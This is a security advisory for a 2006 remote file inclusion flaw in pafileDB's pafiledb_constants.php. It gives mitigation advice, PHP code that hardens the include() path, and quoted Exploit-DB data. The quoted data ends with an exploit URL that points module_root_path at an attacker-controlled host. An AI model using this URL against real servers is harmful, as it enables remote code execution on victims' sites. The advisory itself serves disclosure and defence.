Vendor: pafileDB
By: Darkfire and IR4DEX GROUP
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: pafileDB
Affected Version From: not specified
Affected Version To: not specified
Patch Exists: NO
Year: 2006

PafileDB Remote File Inclusion[phpBB]

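A remote file inclusion vulnerability exists in the pafiledb_constants.php script of pafileDB. The script builds the path passed to include() from the $module_root_path variable, and the request in the advisory below sets that variable through the module_root_path query parameter. By sending such a crafted HTTP request, an attacker can make the server include a file from a remote host and so execute arbitrary code on the vulnerable server.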

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any file operations.
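
One way to harden the include quoted in the Exploit-DB data below, as an added example that is not pafileDB's or phpBB's own code: the root path comes from a server-side constant and every path component is validated before include() runs. PAFILEDB_ROOT, resolve_language_file() and the temp-directory fixture are assumptions made for this sketch; IN_PHPBB is the guard constant that phpBB 2 scripts check.

```php
<?php
// Added example. PAFILEDB_ROOT, resolve_language_file() and the temp directory
// are constructed for this sketch; IN_PHPBB is phpBB 2's entry-point guard constant.

function resolve_language_file(string $root, string $language, string $ext): string
{
    // A local directory only: no scheme://, so no http://, ftp:// or php:// wrappers.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $root)) {
        throw new InvalidArgumentException('root path must be a local directory');
    }
    // Allow-list the variable path parts rather than stripping "bad" characters.
    if (!preg_match('/^lang_[a-z_]+$/', $language) || !preg_match('/^[a-z0-9]+$/', $ext)) {
        throw new InvalidArgumentException('invalid language or extension');
    }
    $base = realpath($root);
    if ($base === false || !is_dir($base)) {
        throw new InvalidArgumentException('root path does not exist');
    }
    // Resolve symlinks and ../ and require the result to stay under the root.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $file = realpath($prefix . 'language/' . $language . '/lang_pafiledb.' . $ext);
    if ($file === false || strpos($file, $prefix) !== 0) {
        throw new InvalidArgumentException('language file not found under root');
    }
    return $file;
}

// Constructed fixture standing in for an installed module tree.
$root = sys_get_temp_dir() . '/pafiledb_demo_' . getmypid();
mkdir($root . '/language/lang_english', 0700, true);
file_put_contents($root . '/language/lang_english/lang_pafiledb.php', "<?php \$lang = ['ok' => true];");

// The root comes from a constant set by the application, never from the request,
// and the file refuses to run unless it was reached through the application.
define('IN_PHPBB', true);          // normally defined by the phpBB entry script
define('PAFILEDB_ROOT', $root);
if (!defined('IN_PHPBB')) {
    exit('Direct access not permitted');
}
include resolve_language_file(PAFILEDB_ROOT, 'lang_english', 'php');
var_dump($lang['ok']);

// A remote root supplied from outside is rejected before include() is reached.
try {
    resolve_language_file('http://remote.example/', 'lang_english', 'php');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

As defence in depth, keeping `allow_url_include` set to `Off` in php.ini (the default since PHP 5.2) stops include() from fetching URLs even if a path check is missed.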

Exploit-DB raw data:

# PafileDB Remote File Inclusion[phpBB]
#
# Contact : irc.gigachat.net #ir4dex & darkfire@f4kelive.zzn.com
# Risk : High
# Class : Remote
# Script : pafileDB
# Version : not specified

---------------------------------------------------------------------

Vulnerable code :

$link_language = 'lang_english';
include( $module_root_path . 'language/' . $link_language . '/lang_pafiledb.' . $phpEx );
---------------------------------------------------------------------

http://www.site.com/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker]

by Darkfire and IR4DEX GROUP
Greetz: Smurf_RedHat :: V0lks

# milw0rm.com [2006-05-09]